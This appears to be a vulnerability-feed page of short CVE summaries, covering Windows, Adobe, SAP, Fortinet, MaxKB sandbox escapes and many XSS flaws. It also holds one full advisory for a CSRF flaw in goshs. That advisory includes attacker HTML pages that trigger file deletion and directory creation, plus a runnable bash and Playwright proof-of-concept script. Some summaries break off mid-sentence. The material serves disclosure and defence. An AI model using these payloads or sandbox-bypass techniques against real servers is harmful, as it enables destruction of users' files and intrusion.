MaxKB versions 2.7.1 and below allow authenticated users with tool execution privileges to bypass the LD_PRELOAD-based sandbox via the env command, enabling unrestricted remote code execution and network access. The vulnerability stems from a patch that permitted execution of /usr/bin/env, which attackers can exploit using env -i to clear environment variables and drop the sandbox.so hook before spawning a native Python subprocess. Vendor-released patch: version 2.8.0.
MaxKB versions 2.7.1 and below allow authenticated attackers with workspace privileges to execute arbitrary code by exploiting a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to invoke raw system calls and bypassing the LD_PRELOAD-based sandbox.so module through the unblocked pkey_mprotect syscall, attackers can achieve remote code execution, enabling network exfiltration and container compromise. This vulnerability is confirmed fixed in version 2.8.0, and no public exploit code has been identified at time of analysis.
Adobe FrameMaker 2022.8 and earlier allows arbitrary file system read through improper input validation when a user opens a malicious file, enabling attackers to access sensitive data on the victim's system. The vulnerability requires user interaction and is classified as information disclosure with a CVSS score of 6.3. No active exploitation or public exploit code has been identified at the time of analysis.
Prototype pollution in Adobe Acrobat Reader versions 26.001.21411, 24.001.30360, 24.001.30362 and earlier allows arbitrary file system read operations in the context of the current user when a victim opens a malicious PDF or document. The vulnerability requires user interaction but enables confidentiality compromise with high impact; no active exploitation confirmed but the attack surface is broad given Acrobat Reader's ubiquity in document handling.
Improper authentication in Windows Active Directory enables local spoofing attacks on unauthenticated users, allowing attackers with local access to bypass authentication mechanisms and gain unauthorized access to sensitive information. This vulnerability affects multiple Windows 10 and Windows 11 versions as well as Windows Server 2016 through 2025. A vendor-released patch is available from Microsoft, and the moderate CVSS score (6.2) reflects the local attack vector requirement combined with high confidentiality impact.
Buffer over-read in Windows Kernel Memory allows authenticated local attackers to disclose sensitive kernel information with high confidence. CVE-2026-26169 affects Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2016 through 2025. The vulnerability requires local access and low-level user privileges but does not enable privilege escalation or code execution. Microsoft has released vendor patches addressing the issue across all affected versions.
Reflected cross-site scripting (XSS) in Adobe Connect 2025.3, 12.10, and earlier allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via a crafted URL, potentially compromising user session data and performing actions on behalf of the victim. The vulnerability affects multiple versions across a wide product scope and requires user interaction (clicking a malicious link) to trigger. No public exploit code or active exploitation has been confirmed at the time of analysis.
Reflected Cross-Site Scripting in Adobe Connect versions 12.10 and earlier allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by distributing a malicious URL. The vulnerability requires user interaction (clicking a link) and can affect the confidentiality and integrity of user sessions across different origins due to changed scope. No public exploit code or active exploitation has been confirmed at this time.
Reflected Cross-Site Scripting (XSS) in SAP Supplier Relationship Management (SRM) SICF Handler allows unauthenticated remote attackers to craft malicious URLs that, when accessed by victims, execute arbitrary JavaScript within their browsers. Successful exploitation enables attackers to steal session credentials, modify procurement data, or perform actions on behalf of authenticated users, affecting confidentiality and integrity of SRM operations. The vulnerability carries a CVSS score of 6.1 with moderate real-world risk due to required user interaction and cross-origin constraints, though no public exploit code or active exploitation has been confirmed at the time of analysis.
Cross-site scripting via code injection in SAP NetWeaver Application Server Java Web Dynpro allows unauthenticated remote attackers to inject arbitrary client-side code through crafted input, compromising user sessions and application data integrity when victims interact with the affected functionality. CVSS 6.1 (medium) reflects the requirement for user interaction and limited scope, but exploitation is straightforward with no authentication needed and low attack complexity.
Windows Biometric Service contains a race condition in concurrent resource access that allows unauthorized attackers to bypass biometric authentication controls via physical attack, affecting Windows 10 (versions 1809, 21H2, 22H2), Windows 11 (versions 22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2019, 2022, and 2025. The vulnerability requires physical access to the device and carries a moderate CVSS score of 6.1 (physical attack vector); Microsoft has released patches for all affected versions.
Stored cross-site scripting (XSS) in Windows Admin Center before version 2.6.5.16 allows unauthenticated remote attackers to inject malicious scripts that execute in the browsers of other users, enabling account spoofing and data theft. The vulnerability requires user interaction (clicking a malicious link) but has network-wide scope, affecting all users of the Admin Center instance. Microsoft has released a patched version; exploitation is currently limited to scenarios where attackers can socially engineer clicks on crafted URLs.
Open redirect in SAP NetWeaver Application Server ABAP allows unauthenticated attackers to craft malicious URLs that redirect victims to attacker-controlled pages, potentially enabling phishing or credential theft attacks. The vulnerability affects all versions of SAP NetWeaver Application Server ABAP and requires user interaction (URL click). CVSS score of 6.1 reflects moderate risk with low confidentiality and integrity impact but no availability impact. No public exploit code or active exploitation has been reported at time of analysis.
Reflected Cross-Site Scripting (XSS) Vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities.
Leaflet through version 1.9.4 allows stored or reflected cross-site scripting (XSS) via the bindPopup() method, which renders user-supplied HTML without sanitization. Network-based attackers can inject malicious JavaScript through event handler attributes in popup content, executing arbitrary code in victims' browser sessions when they interact with affected map popups. No public exploit code or active exploitation has been confirmed at this time, though the vulnerability carries a CVSS 6.1 base score reflecting moderate risk with network-accessible attack surface and user interaction requirement.
Stored or reflected cross-site scripting (XSS) in alandsilva26 hotel-management-php 1.0 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in the context of authenticated administrators via a malicious room_id GET parameter in /public/admin/edit_room.php. Public exploit code exists (SSVC confirms poc status). The vulnerability requires user interaction (UI:R) to trigger, affecting confidentiality and integrity of admin sessions with partial technical impact.
Reflected cross-site scripting (XSS) in manikandan580 School-management-system 1.0 allows unauthenticated remote attackers to inject malicious scripts via the pagedes POST parameter in /studentms/admin/contact-us.php, affecting users with browser cookies or session tokens. Publicly available exploit code exists, and the vulnerability impacts confidentiality and integrity with moderate scope. CVSS score of 6.1 reflects the requirement for user interaction to trigger the malicious payload.
Open redirect vulnerability in AdonisJS @adonisjs/http-server allows unauthenticated remote attackers to redirect users to arbitrary external sites by manipulating the Referer HTTP header via the response.redirect().back() method. The vulnerability affects all AdonisJS applications using the back() redirect functionality and has been patched in version 8.2.0, which implements host validation against the incoming request's Host header. User interaction (clicking a malicious link) is required for exploitation, and no public exploit code or active exploitation has been identified.
### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Reflected cross-site scripting (XSS) in School Management System 1.0 allows unauthenticated remote attackers to inject malicious scripts via the email POST parameter in the contact-us.php admin interface. A victim must click a crafted link, enabling attackers to steal session cookies, perform administrative actions, or redirect users to malicious sites. Public proof-of-concept code exists; however, real-world exploitation probability remains low (EPSS 0.02%) due to reliance on user interaction and limited automaton.
Path traversal vulnerability in Fortinet FortiAnalyzer and FortiManager (versions 7.0 through 7.6.4, including Cloud variants) allows privileged local attackers to delete arbitrary files from the underlying filesystem via crafted CLI requests. The vulnerability affects both on-premises and cloud deployments across multiple major versions. CVSS 6.0 reflects moderate integrity and availability impact, constrained by requirement for high-privilege CLI access and local attack vector.
Path traversal vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiSwitchManager allows authenticated administrators with read-write permissions to write or delete arbitrary files via malicious CLI commands, potentially compromising system integrity and availability across multiple Fortinet product lines. The vulnerability affects FortiOS 6.4 through 7.6.4, FortiProxy 7.0 through 7.6.4, FortiPAM 1.0 through 1.7.0, and FortiSwitchManager 7.0 through 7.2.7. With a CVSS score of 6.0 a
Hard-coded cryptographic keys in Fortinet FortiClientEMS 7.4.0 through 7.4.5 allow local authenticated attackers with high privileges to disclose sensitive information and potentially modify system configurations. An attacker with administrative access can extract or leverage these embedded keys to compromise confidentiality and integrity of protected data. This vulnerability requires local access and elevated privileges, limiting but not eliminating real-world risk in multi-user or compromised endpoint scenarios.
SpiceDB information disclosure vulnerability in startup logging allows high-privileged local attackers to obtain plaintext database passwords. When SpiceDB initializes at info log level, the startup configuration log message exposes the complete datastore DSN string containing unmasked credentials in the DatastoreConfig.URI field. Patch version 1.51.1 available; CVSS 6.0 reflects high confidentiality impact mitigated by high privilege requirement and local-only attack vector.
Ivanti Neurons for ITSM before version 2025.4 allows authenticated attackers to retain access to disabled accounts via an unprotected alternate authentication path, enabling persistent unauthorized information disclosure. The vulnerability affects both on-premise and cloud deployments and requires user interaction (UI:R), limiting but not eliminating real-world risk in multi-user environments where account disablement is a critical security control.
Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows authorized local attackers to bypass security features, affecting Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2016-2025. With a CVSS score of 5.7 and high privilege requirement (PR:H), the vulnerability requires administrative or high-privilege account access but presents significant confidentiality and integrity risk to isolated security domai
Stored cross-site scripting (XSS) in Microsoft SharePoint Server allows authenticated users to inject malicious scripts that execute in the browsers of other authorized users viewing affected web pages, enabling account spoofing and credential theft within enterprise collaboration environments. The vulnerability affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition across all versions prior to specific patch releases. CVSS score of 4.6 reflects low severity due to authentication requirement and user interaction needed, but real-world risk is elevated in multi-user SharePoint deployments where XSS can be weaponized for privilege escalation or lateral movement.
Type confusion in Windows COM component allows authenticated local attackers to read sensitive information from memory. The vulnerability affects Windows 10 (versions 1809, 21H2, 22H2), Windows 11 (versions 22H3 through 26H1), and Windows Server 2019/2022/2025 across multiple installation types. An attacker with local user privileges can exploit improper type handling in COM to disclose confidential data without modifying or disrupting system availability. Microsoft has released patches addressing this information disclosure risk.
Improper link resolution in Windows UPnP (upnp.dll) allows authenticated local attackers to disclose sensitive information through symlink following. The vulnerability affects Windows 10 versions 1607-22H2, Windows 11 versions 22H3-26H1, and Windows Server 2012-2025. With local access and standard user privileges, an attacker can read files outside their normal access scope via crafted UPnP operations. Patch available from Microsoft; no public exploit code or active exploitation confirmed at tim
Out-of-bounds read in Windows GDI allows local unauthenticated attackers to disclose sensitive information with user interaction. The vulnerability affects Windows 10 versions 1607, 1809, 21H2, and 22H2, all Windows 11 versions from 22H3 through 26H1, and Windows Server 2012 through 2025. No public exploit code or active exploitation has been confirmed; a vendor patch is available.
Out-of-bounds read in Windows GDI (Graphics Device Interface) allows local attackers to disclose sensitive information without authentication. The vulnerability affects Windows 10 versions 21H2 and 22H2, Windows 11 versions 22H3 through 26H1, and Windows Server 2022/2025, requiring user interaction to trigger. Microsoft has released patches for all affected versions, with specific build numbers provided for remediation.
Windows File Explorer exposes sensitive information to authenticated local users with low privileges, allowing them to read confidential data without modification or service disruption. This affects multiple Windows 10 and Windows 11 versions, as well as Windows Server 2012 through 2025. Microsoft has released patches addressing the information disclosure vector; exploitation requires local system access and valid user credentials.
Null pointer dereference in Windows Redirected Drive Buffering denies service to local authenticated users on Windows 11 version 26H1 (build 10.0.28000.0-10.0.28000.1835). An authorized attacker with local access can trigger the vulnerability to crash the affected system component, though code execution is not possible. Vendor-released patch available; no public exploit code identified at time of analysis.
Improper access control in Universal Plug and Play (upnp.dll) on Windows allows authenticated local attackers to disclose sensitive information without user interaction. The vulnerability affects Windows 10 (versions 1607, 1809, 21H2, 22H2), Windows 11 (versions 22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2012-2025. Microsoft has released patches available through their security update guide; no public exploit code or active exploitation has been reported at time of analysis.
Improper access control in Microsoft Dynamics 365 (on-premises) version 9.0 allows authenticated local attackers to disclose sensitive information without user interaction. The vulnerability stems from insufficient authorization checks that permit users with low-level privileges to access confidential data through local access vectors. This affects Dynamics 365 on-premises deployments up to version 9.0.0043.x, with vendor-released patches available from Microsoft.
Improper privilege management in Microsoft Windows allows authenticated local attackers to deny service by exploiting a privilege escalation flaw affecting Windows 10 versions 21H2 and 22H2, Windows 11 versions 22H3 through 26H1, and Windows Server 2022 and 2025. The vulnerability requires local access and valid credentials but does not permit code execution or data manipulation. CVSS 5.5 reflects moderate severity; CISA SSVC framework rates exploitation as none with partial technical impact, indicating this is not currently a priority threat despite patch availability.
Heap-based buffer overflow in Adobe FrameMaker 2022.8 and earlier allows local attackers to disclose sensitive information from process memory without user privileges, requiring only that a victim open a malicious document. CVSS 5.5 reflects confidentiality impact with low attack complexity, though no active exploitation or public proof-of-concept has been confirmed at analysis time.
Adobe FrameMaker 2022.8 and earlier suffers from uninitialized pointer access that leaks sensitive memory contents to local attackers. The vulnerability requires user interaction-a victim must open a specially crafted file-but once triggered, it bypasses memory protections and exposes confidential data without requiring authentication or modifying files. CVSS 5.5 reflects moderate severity (local attack vector, high confidentiality impact) with no public exploit identified at time of analysis.
Out-of-bounds write in Adobe DNG SDK 1.7.1 2502 and earlier causes application denial-of-service through memory corruption when processing malicious DNG files. The vulnerability requires user interaction (opening a crafted file) and affects local attackers on systems where DNG SDK is deployed; no public exploit code or active exploitation has been confirmed at time of analysis.
Heap-based buffer overflow in Adobe InDesign Desktop versions 21.2 and earlier allows local attackers to disclose sensitive information from memory without authentication, requiring only user interaction to open a malicious file. The vulnerability has a CVSS score of 5.5 with high confidentiality impact but no integrity or availability impact. No public exploit code or active exploitation has been confirmed at time of analysis.
Divide by zero vulnerability in Adobe Bridge versions 15.1.4 and earlier allows local denial of service when a victim opens a malicious file, crashing or freezing the application. The vulnerability requires user interaction and local file access but carries a moderate CVSS score of 5.5 due to high availability impact; no public exploit code or active exploitation has been confirmed.
Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier allows local attackers to cause application denial-of-service by crafting malicious files that trigger memory corruption when opened. This vulnerability requires user interaction to exploit and does not enable code execution or data compromise, making it primarily a disruption vector rather than a critical attack surface despite its moderate CVSS score of 5.5.
Authorization bypass in sigstore/timestamp-authority verifier allows attackers to prepend forged certificates to PKCS#7 certificate bags, causing the library to validate signatures with one certificate while performing authorization checks on another. The vulnerability affects the `VerifyTimestampResponse` function in timestamp-authority/v2/pkg/verification, enabling attackers to bypass authorization controls on timestamp verification. This impacts only library consumers, not the timestamp-authority service itself, and sigstore-go is unaffected due to its use of the `TSACertificate` mitigation option. EPSS 5.5, actively exploitable via local interaction.
Stored cross-site scripting (XSS) in Ivanti Neurons for ITSM (on-premise and cloud) before version 2025.4 allows authenticated remote attackers to inject malicious scripts that execute in other users' sessions, enabling limited information disclosure. User interaction is required to trigger the vulnerability. No public exploit code or active exploitation has been identified.
An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.
Docmost versions 0.3.0 through 0.70.x allow authenticated users with low privileges to overwrite arbitrary attachments belonging to other users within the same workspace via improper authorization checks on the POST /api/files/upload endpoint. An attacker can supply a victim's attachmentId to modify or corrupt files without user interaction, compromising document integrity across the workspace. No public exploit code has been identified; patch version 0.71.0 is available.
Stored cross-site scripting (XSS) in Docmost prior to version 0.71.0 allows authenticated users to inject malicious `javascript:` URLs into attachment nodes, executing arbitrary JavaScript in the browser context of other users who activate those attachments. Attack requires low privileges and user interaction (clicking the attachment), affecting all users viewing compromised pages. The vulnerability has been patched in version 0.71.0.
DOM-based cross-site scripting in Adobe Experience Manager 6.5.24 and earlier allows authenticated attackers to execute arbitrary JavaScript in a victim's browser by crafting a malicious webpage that manipulates the DOM environment. The vulnerability requires user interaction and results in limited confidentiality and integrity impact. No public exploit code or active exploitation has been confirmed at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager 6.5.24 and FP11.7 and earlier allows authenticated attackers to execute arbitrary JavaScript in victims' browsers by crafting malicious web pages that manipulate the DOM environment, requiring user interaction to trigger the attack. CVSS 5.4 reflects moderate severity with network-accessible attack surface but limited scope impact. No public exploit code or active exploitation has been confirmed at time of analysis.
DOM-based cross-site scripting in Adobe Experience Manager 6.5.24 and FP11.7 earlier allows authenticated users to execute arbitrary JavaScript in victims' browsers by crafting malicious webpages that manipulate the DOM environment. The vulnerability requires user interaction (victim must visit a crafted page) and affects the confidentiality and integrity of user sessions within the AEM application context. CVSS 5.4 reflects the moderate severity; no public exploit code or active exploitation has been confirmed at time of analysis.